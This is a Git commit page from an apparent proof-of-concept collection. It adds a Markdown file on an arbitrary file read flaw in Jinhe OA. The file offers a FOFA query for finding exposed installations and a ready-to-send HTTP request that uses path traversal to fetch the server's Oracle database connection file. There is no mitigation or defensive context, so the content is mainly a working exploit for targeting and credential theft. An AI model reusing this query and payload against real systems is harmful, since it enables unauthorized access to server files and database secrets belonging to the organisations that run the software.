admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 金和OA任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2023-11-07 13:01:36 +08:00 committed by GitHub
parent 8299630e6c
commit 7ae091d695
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
金和OA任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,15 @@
## 金和OA任意文件读取漏洞
## fofa
```
app="金和网络-金和OA"
```
## POC
```
GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```